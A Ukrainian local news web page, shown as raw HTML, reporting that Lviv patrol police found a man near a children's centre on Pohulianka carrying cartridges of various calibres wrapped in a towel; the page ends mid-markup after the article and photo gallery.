<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=1280">
    <title>На Погулянці чоловік розгулював з патронами в рушнику (фото) - Львівська газета</title>
	<link rel="icon" href="http://gazeta.lviv.ua/wp-content/themes/gazeta/favicon.ico" type="image/x-icon"></link> 
	<link rel="shortcut icon" href="http://gazeta.lviv.ua/wp-content/themes/gazeta/favicon.ico" type="image/x-icon"></link>
	
<!-- This site is optimized with the Yoast SEO plugin v5.3.3 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="Патрульні виявили в чоловіка на вулиці набої різного калібру Як інформує Патрульна поліція Львова, вчора небайдужий громадянин зателефонував за номером 102 та повідомив про підозрілого чоловіка неподалік Центру творчості дітей та юнацтва на Погулянці. Патрульні прибули на місце та побачили" />
<meta name="twitter:title" content="На Погулянці чоловік розгулював з патронами в рушнику (фото) - Львівська газета" />
<meta name="twitter:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21272383_1740747652893666_3076109640617608885_n-250x250.jpg" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/gazeta.lviv.ua\/","name":"\u041d\u0430\u0439\u0441\u0432\u0456\u0436\u0456\u0448\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u043c\u0456\u0441\u0442\u0430 \u041b\u044c\u0432\u043e\u0432\u0430 \u0442\u0430 \u0423\u043a\u0440\u0430\u0457\u043d\u0438 \u0432 \u0440\u0435\u0436\u0438\u043c\u0456 \u043e\u043d\u043b\u0430\u0439\u043d - \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0430 \u0433\u0430\u0437\u0435\u0442\u0430","alternateName":"\u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u0449\u043e\u0445\u0432\u0438\u043b\u0438\u043d\u0438. \u041e\u0441\u0442\u0430\u043d\u043d\u0456 \u043d\u043e\u0432\u0438\u043d\u0438 \u043f\u043e\u043b\u0456\u0442\u0438\u043a\u0438, \u0435\u043a\u043e\u043d\u043e\u043c\u0456\u043a\u0438, \u0441\u043f\u043e\u0440\u0442\u0443 \u0442\u0430 \u043a\u0443\u043b\u044c\u0442\u0443\u0440\u0438. \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u0430 \u0433\u0430\u0437\u0435\u0442\u0430 \u043e\u043d\u043b\u0430\u0439\u043d","potentialAction":{"@type":"SearchAction","target":"http:\/\/gazeta.lviv.ua\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Львівська газета &raquo; На Погулянці чоловік розгулював з патронами в рушнику (фото) Канал коментарів" href="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/gazeta.lviv.ua\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.1"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b===c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='realmodals-css'  href='http://gazeta.lviv.ua/wp-content/plugins/real-kit/modules/modals/style.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='archives-cal-calendrier-css'  href='http://gazeta.lviv.ua/wp-content/plugins/archives-calendar-widget/themes/calendrier.css?ver=1.0.12' type='text/css' media='all' />
<link rel='stylesheet' id='wp-pagenavi-css'  href='http://gazeta.lviv.ua/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<link rel='stylesheet' id='fonts-css'  href='https://fonts.googleapis.com/css?family=Fira+Sans%3A400%2C400i%2C500%2C500i%2C700%2C700i%7COpen+Sans%3A400%2C400i%2C700%2C700i%7CPT+Sans%3A400%2C400i%2C700%2C700i%7CPT+Serif%3A400%2C400i%2C700%2C700i&#038;ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='awesome-css'  href='http://gazeta.lviv.ua/wp-content/themes/gazeta/css/font-awesome.min.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='theme-style-css'  href='http://gazeta.lviv.ua/wp-content/themes/gazeta/style.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='gk-nsp-css'  href='http://gazeta.lviv.ua/wp-content/plugins/gk-nsp/gk-nsp.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://gazeta.lviv.ua/wp-includes/css/dashicons.min.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://gazeta.lviv.ua/wp-includes/js/thickbox/thickbox.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='et-builder-modules-style-css'  href='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/styles/frontend-builder-plugin-style.css?ver=1.2.3' type='text/css' media='all' />
<link rel='stylesheet' id='magnific-popup-css'  href='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/styles/magnific_popup.css?ver=1.2.3' type='text/css' media='all' />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css'  href='http://gazeta.lviv.ua/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.14' type='text/css' media='all' />
<link rel='stylesheet' id='fancybox-css'  href='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.css?ver=1.6' type='text/css' media='screen' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://gazeta.lviv.ua/wp-content/plugins/jetpack/css/jetpack.css?ver=5.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/real-kit/modules/modals/script.js?ver=4.8.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/archives-calendar-widget/admin/js/jquery.arcw-init.js?ver=1.0.12'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/themes/gazeta/js/jquery.cycle.js?ver=4.8.1'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/themes/gazeta/js/theme-script.js?ver=4.8.1'></script>
<link rel='https://api.w.org/' href='http://gazeta.lviv.ua/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://gazeta.lviv.ua/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://gazeta.lviv.ua/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.8.1" />
<link rel='shortlink' href='http://wp.me/p874c2-FLJ' />
<link rel="alternate" type="application/json+oembed" href="http://gazeta.lviv.ua/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://gazeta.lviv.ua/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F&#038;format=xml" />

<script type="text/javascript">
var a2a_config=a2a_config||{};a2a_config.callbacks=a2a_config.callbacks||[];a2a_config.templates=a2a_config.templates||{};a2a_localize = {
	Share: "Share",
	Save: "Save",
	Subscribe: "Subscribe",
	Email: "Email",
	Bookmark: "Bookmark",
	ShowAll: "Show all",
	ShowLess: "Show less",
	FindServices: "Find service(s)",
	FindAnyServiceToAddTo: "Instantly find any service to add to",
	PoweredBy: "Powered by",
	ShareViaEmail: "Share via email",
	SubscribeViaEmail: "Subscribe via email",
	BookmarkInYourBrowser: "Bookmark in your browser",
	BookmarkInstructions: "Press Ctrl+D or \u2318+D to bookmark this page",
	AddToYourFavorites: "Add to your favorites",
	SendFromWebOrProgram: "Send from any email address or email program",
	EmailProgram: "Email program",
	More: "More&#8230;"
};

</script>
<script type="text/javascript" src="https://static.addtoany.com/menu/page.js" async="async"></script>
<meta property="fb:app_id" content="1083471841726549"/>
<link rel='dns-prefetch' href='//v0.wordpress.com'>
<style type='text/css'>img#wpstats{display:none}</style><link rel="amphtml" href="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/amp/" />
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="На Погулянці чоловік розгулював з патронами в рушнику (фото)" />
<meta property="og:url" content="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/" />
<meta property="og:description" content="Патрульні виявили в чоловіка на вулиці набої різного калібру" />
<meta property="article:published_time" content="2017-09-07T06:40:16+00:00" />
<meta property="article:modified_time" content="2017-09-07T06:40:16+00:00" />
<meta property="og:site_name" content="Львівська газета" />
<meta property="og:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21272383_1740747652893666_3076109640617608885_n-250x250.jpg" />
<meta property="og:image:secure_url" content="https://i0.wp.com/gazeta.lviv.ua/wp-content/uploads/2017/09/21272383_1740747652893666_3076109640617608885_n-250x250.jpg" />
<meta property="og:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21414784_1740747479560350_1104569553011214500_o-250x250.jpg" />
<meta property="og:image:secure_url" content="https://i1.wp.com/gazeta.lviv.ua/wp-content/uploads/2017/09/21414784_1740747479560350_1104569553011214500_o-250x250.jpg" />
<meta property="og:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21432993_1740747666226998_3157858241338808708_n-250x250.jpg" />
<meta property="og:image:secure_url" content="https://i1.wp.com/gazeta.lviv.ua/wp-content/uploads/2017/09/21432993_1740747666226998_3157858241338808708_n-250x250.jpg" />
<meta property="og:locale" content="uk_UA" />
<meta name="twitter:image" content="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21272383_1740747652893666_3076109640617608885_n-250x250.jpg?w=1400" />
<meta name="twitter:card" content="summary_large_image" />

<!-- Easy FancyBox 1.6 using FancyBox 1.3.8 - RavanH (http://status301.net/wordpress-plugins/easy-fancybox/) -->
<script type="text/javascript">
/* <![CDATA[ */
var fb_timeout = null;
var fb_opts = { 'overlayShow' : true, 'hideOnOverlayClick' : true, 'showCloseButton' : true, 'margin' : 20, 'centerOnScroll' : true, 'enableEscapeButton' : true, 'autoScale' : true };
var easy_fancybox_handler = function(){
	/* IMG */
	var fb_IMG_select = 'a[href*=".jpg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpg"]:not(.nolightbox), a[href*=".jpeg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpeg"]:not(.nolightbox), a[href*=".png"]:not(.nolightbox,li.nolightbox>a), area[href*=".png"]:not(.nolightbox), a[href*=".webp"]:not(.nolightbox,li.nolightbox>a), area[href*=".webp"]:not(.nolightbox)';
	jQuery(fb_IMG_select).addClass('fancybox image');
	var fb_IMG_sections = jQuery('div.gallery ');
	fb_IMG_sections.each(function() { jQuery(this).find(fb_IMG_select).attr('rel', 'gallery-' + fb_IMG_sections.index(this)); });
	jQuery('a.fancybox, area.fancybox, li.fancybox a').fancybox( jQuery.extend({}, fb_opts, { 'transitionIn' : 'elastic', 'easingIn' : 'easeOutBack', 'transitionOut' : 'elastic', 'easingOut' : 'easeInBack', 'opacity' : false, 'hideOnContentClick' : false, 'titleShow' : true, 'titlePosition' : 'over', 'titleFromAlt' : true, 'showNavArrows' : true, 'enableKeyboardNav' : true, 'cyclic' : false }) );
}
var easy_fancybox_auto = function(){
	/* Auto-click */
	setTimeout(function(){jQuery('#fancybox-auto').trigger('click')},1000);
}
/* ]]> */
</script>
	
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9951724072058821",
    enable_page_level_ads: true
  });
</script>


</head>
<body  class="post-template-default single single-post postid-160563 single-format-standard  et_divi_builder"> 


<script>
        (function (i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date();
            a = s.createElement(o),
                    m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m)
        })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

        ga('create', 'UA-75408624-1', 'auto');
        ga('send', 'pageview');

    </script>

	<div id="wrapper">
        <header id="header">
        	<div class="center">
            	<div class="header-panel clearfix">
                	                    <div class="top-slides">
                    	<ul id="top-slides-list">
                        	                            <li>
                            	                                <a href="http://gazeta.lviv.ua/2017/09/02/uzhe-13-veresnya-u-lvovi-startuye-24-forum-vidavciv-programa/">
                                                                	<span class="thumb"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/forum-vidavtsiv1-300x180.png" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></span>
                                    <span class="caption"><span class="cell">Програма 24 Форуму видавців</span></span>
								                                </a>
                                                            </li>
                                                    </ul>
                    </div>
                                        <div class="header-panel-right">
                    	                        <ul class="header-socials">
                        	<li class="mobile-swatch"><a href="/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/?mobile_switch=mobile" title="Версія для мобільних"><i class="fa fa-mobile"></i></a></li>
							<li><a href="http://facebook.com/lvivskagazeta/" target="_blank"><i class="fa fa-facebook"></i></a></li>                                                        <li><a href="https://www.youtube.com/channel/UCJiKZoY0vRxONsAgIuzNcuQ" target="_blank"><i class="fa fa-youtube-play"></i></a></li>                                                        <li><a href="http://gazeta.lviv.ua/feed/" target="_blank"><i class="fa fa-feed"></i></a></li>                        </ul>
                        <div class="header-radio"><aside id="custom_html-2" class="widget_text all-devices  widget_custom_html"><div class="textwidget custom-html-widget"><a href="http://www.galychyna.fm/" target="_blank"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/galychyna.jpg" alt="FM Галичина"></a></div></aside></div>
                    </div>
                    <div class="logo_block">
                		                    	<a id="logo" href="http://gazeta.lviv.ua" title="Львівська газета"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/logo.png" alt="Львівська газета"></a>
                	</div>
                </div><!-- end header-panel -->
                <div class="header-main">
                	<div class="gray-row clearfix">
                    	<ul id="menu-main-menu" class="main_menu"><li id="menu-item-160249" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-160249"><a href="http://gazeta.lviv.ua/"><i class="fa fa-home"></i></a></li>
<li id="menu-item-239" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-239"><a href="http://gazeta.lviv.ua/novini/">Новини</a></li>
<li id="menu-item-160269" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160269"><a href="http://gazeta.lviv.ua/interview/">Інтерв&#8217;ю</a></li>
<li id="menu-item-160270" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160270"><a href="http://gazeta.lviv.ua/specprojects/">Спецпроекти</a></li>
<li id="menu-item-242" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-242"><a href="http://gazeta.lviv.ua/foto/">Фото-відео</a></li>
<li id="menu-item-130196" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-130196"><a href="http://gazeta.lviv.ua/blogi/">Блоги</a></li>
</ul>                        <div class="header-search"><div class="search-block">
    <form method="get" id="searchform" action="http://gazeta.lviv.ua/">
        <input type="text" class="input-search" placeholder="Пошук" name="s" id="s" value="" />
        <button type="submit" class="submit-search" name="submit" id="searchsubmit"><i class="fa fa-search"></i></button>
    </form>
</div></div>
                    </div>
                    <div class="white-row clearfix">
                    	<ul id="menu-news-menu" class="news_menu"><li id="menu-item-160318" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160318"><a href="http://gazeta.lviv.ua/politika-2/">Політика</a></li>
<li id="menu-item-160250" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160250"><a href="http://gazeta.lviv.ua/ekonomika-2/">Бізнес</a></li>
<li id="menu-item-160254" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160254"><a href="http://gazeta.lviv.ua/novini/suspilstvo/">Суспільство</a></li>
<li id="menu-item-160251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160251"><a href="http://gazeta.lviv.ua/kultura/">Культура</a></li>
<li id="menu-item-160252" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160252"><a href="http://gazeta.lviv.ua/lyudi-lvova/">Люди Львова</a></li>
<li id="menu-item-160273" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160273"><a href="http://gazeta.lviv.ua/stil-zhittya/">Стиль життя</a></li>
</ul>                        <div class="header-weather">

                            <div class="weather-date">7 вересня 2017</div>
                            <div id="gsInformerID-ghJYhjkE8h5tGb" class="gsInformer" style="width:173px;height:87px">
                              <div class="city">у Львові</div>
                              <div class="gsIContent">
                                <div id="cityLink">
                                    <a href="https://www.gismeteo.ua/ua/weather-lviv-4949/" title="Погода у Львові" target="_blank">
                                        <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода у Львові">
                                    </a>
                                </div>
                                <div class="gsLinks" style="display:none;"></div>
                              </div>
                            </div>
                            <script src="https://www.gismeteo.ua/ajax/getInformer/?hash=ghJYhjkE8h5tGb" type="text/javascript"></script>
                        </div>
                    </div>
                </div><!-- end header-main -->
            </div>
       	</header>
        <div class="center">
        	<div class="header-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><a href="https://delavega.ua/katalog-page/?utm_source=gazeta.lviv.ua&#038;utm_medium=banner&#038;utm_campaign=sale&#038;utm_term=livov&#038;utm_content=divanylivov" target="_blank"><img width="970" height="90" src='http://gazeta.lviv.ua/wp-content/uploads/2017/09/divan-1.jpg' alt='' title='divan' /></a></aside></div><!-- end header-ads-wrap -->
        </div>
		<div id="container">  
        	            <div class="center">
            
	<div class="content_section gray-border clearfix">
        <div class="column_main">
            <div class="column_center">
                				<div class="single-content">
                    <div class="post-header clearfix">
                        <h1>На Погулянці чоловік розгулював з патронами в рушнику (фото)</h1>
                                                <div class="subtitle">Патрульні виявили в чоловіка на вулиці набої різного калібру</div>
                                                <div class="item-meta">
                            <time class="item-date" datetime="">09:40, Чт. - 07 Вер. 2017</time>
                            &nbsp;|&nbsp;
                            <span class="item-author"></span>
                            &nbsp;<span class="item-views"><i class="fa fa-eye"></i> 102</span>
                            &nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/"></span>
                        </div>
                        <div class="share-block"><div class="addtoany_shortcode"><div class="a2a_kit a2a_kit_size_24 addtoany_list" data-a2a-url="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/" data-a2a-title="На Погулянці чоловік розгулював з патронами в рушнику (фото)"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F&amp;linkname=%D0%9D%D0%B0%20%D0%9F%D0%BE%D0%B3%D1%83%D0%BB%D1%8F%D0%BD%D1%86%D1%96%20%D1%87%D0%BE%D0%BB%D0%BE%D0%B2%D1%96%D0%BA%20%D1%80%D0%BE%D0%B7%D0%B3%D1%83%D0%BB%D1%8E%D0%B2%D0%B0%D0%B2%20%D0%B7%20%D0%BF%D0%B0%D1%82%D1%80%D0%BE%D0%BD%D0%B0%D0%BC%D0%B8%20%D0%B2%20%D1%80%D1%83%D1%88%D0%BD%D0%B8%D0%BA%D1%83%20%28%D1%84%D0%BE%D1%82%D0%BE%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F&amp;linkname=%D0%9D%D0%B0%20%D0%9F%D0%BE%D0%B3%D1%83%D0%BB%D1%8F%D0%BD%D1%86%D1%96%20%D1%87%D0%BE%D0%BB%D0%BE%D0%B2%D1%96%D0%BA%20%D1%80%D0%BE%D0%B7%D0%B3%D1%83%D0%BB%D1%8E%D0%B2%D0%B0%D0%B2%20%D0%B7%20%D0%BF%D0%B0%D1%82%D1%80%D0%BE%D0%BD%D0%B0%D0%BC%D0%B8%20%D0%B2%20%D1%80%D1%83%D1%88%D0%BD%D0%B8%D0%BA%D1%83%20%28%D1%84%D0%BE%D1%82%D0%BE%29" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_google_plus" href="https://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F&amp;linkname=%D0%9D%D0%B0%20%D0%9F%D0%BE%D0%B3%D1%83%D0%BB%D1%8F%D0%BD%D1%86%D1%96%20%D1%87%D0%BE%D0%BB%D0%BE%D0%B2%D1%96%D0%BA%20%D1%80%D0%BE%D0%B7%D0%B3%D1%83%D0%BB%D1%8E%D0%B2%D0%B0%D0%B2%20%D0%B7%20%D0%BF%D0%B0%D1%82%D1%80%D0%BE%D0%BD%D0%B0%D0%BC%D0%B8%20%D0%B2%20%D1%80%D1%83%D1%88%D0%BD%D0%B8%D0%BA%D1%83%20%28%D1%84%D0%BE%D1%82%D0%BE%29" title="Google+" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd a2a_counter addtoany_share_save" href="https://www.addtoany.com/share"></a></div></div></div>
                    </div>
                                        <div class="single-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Банер в статті -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:60px"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="4322344197"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside></div>
                    <div class="item-entry text">
					<p>Як інформує <a href="https://www.facebook.com/lvivpolice/?hc_ref=ART553fL5npUWWjvmuaQDNgyEQnqa9h1DsT88jMe3jC8QrXOH7BW-gT82LNrT4il1QE">Патрульна поліція Львова</a>, вчора небайдужий громадянин зателефонував за номером 102 та повідомив про підозрілого чоловіка неподалік Центру творчості дітей та юнацтва на Погулянці. Патрульні прибули на місце та побачили особу, яку описав заявник. Чоловік вирушив у протилежний від інспекторів бік, коли помітив їх, і заховався за дерево. Патрульні зупинили його та попросили представитися. Під час поверхневої перевірки в чоловіка виявили патрони різного калібру, які були загорнені в рушник. Громадянин повідомив, що знайшов їх та відмовився будь-що пояснювати. На місце події викликали слідчо-оперативну групу Личаківського відділу поліції.</p>

		<style type='text/css'>
			#gallery-7 {
				margin: auto;
			}
			#gallery-7 .gallery-item {
				float: left;
				margin-top: 10px;
				text-align: center;
				width: 33%;
			}
			#gallery-7 img {
				border: 2px solid #cfcfcf;
			}
			#gallery-7 .gallery-caption {
				margin-left: 0;
			}
			/* see gallery_shortcode() in wp-includes/media.php */
		</style>
		<div id='gallery-7' class='gallery galleryid-160563 gallery-columns-3 gallery-size-thumbnail'><dl class='gallery-item'>
			<dt class='gallery-icon portrait'>
				<a href='http://gazeta.lviv.ua/wp-content/uploads/2017/09/21272383_1740747652893666_3076109640617608885_n.jpg'><img width="250" height="250" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21272383_1740747652893666_3076109640617608885_n-250x250.jpg" class="attachment-thumbnail size-thumbnail" alt="" aria-describedby="gallery-7-160564" /></a>
			</dt>
				<dd class='wp-caption-text gallery-caption' id='gallery-7-160564'>
				Фото: facebook.com/lvivpolice
				</dd></dl><dl class='gallery-item'>
			<dt class='gallery-icon landscape'>
				<a href='http://gazeta.lviv.ua/wp-content/uploads/2017/09/21414784_1740747479560350_1104569553011214500_o.jpg'><img width="250" height="250" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21414784_1740747479560350_1104569553011214500_o-250x250.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a>
			</dt></dl><dl class='gallery-item'>
			<dt class='gallery-icon portrait'>
				<a href='http://gazeta.lviv.ua/wp-content/uploads/2017/09/21432993_1740747666226998_3157858241338808708_n.jpg'><img width="250" height="250" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/21432993_1740747666226998_3157858241338808708_n-250x250.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a>
			</dt></dl><br style="clear: both" />
		</div>

<div class="addtoany_share_save_container addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_24 addtoany_list" data-a2a-url="http://gazeta.lviv.ua/2017/09/07/na-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto/" data-a2a-title="На Погулянці чоловік розгулював з патронами в рушнику (фото)"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fgazeta.lviv.ua%2F2017%2F09%2F07%2Fna-pogulyanci-cholovik-rozgulyuvav-z-patronami-v-rushniku-foto%2F&amp;linkname=%D0%9D%D0%B0%20%D0%9F%D0%BE%D0%B3%D1%83%D0%BB%D1%8F%D0%BD%D1%86%D1%96%20%D1%87%D0%BE%D0%BB%D0%BE%D0%B2%D1%96%D0%BA%20%D1%80%D0%BE%D0%B7%D0%B3%D1%83%D0%BB%D1%8E%D0%B2%D0%B0%D0%B2%20%D0%B7%20%D0%BF%D0%B0%D1%82%D1%80%D0%BE%D0%BD%D0%B0%D0%BC%D0%B8%20%D0%B2%20%D1%80%D1%83%D1%88%D0%BD%D0%B8%D0%BA%D1%83%20%28%D1%84%D0%BE%D1%82%D0%BE%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" 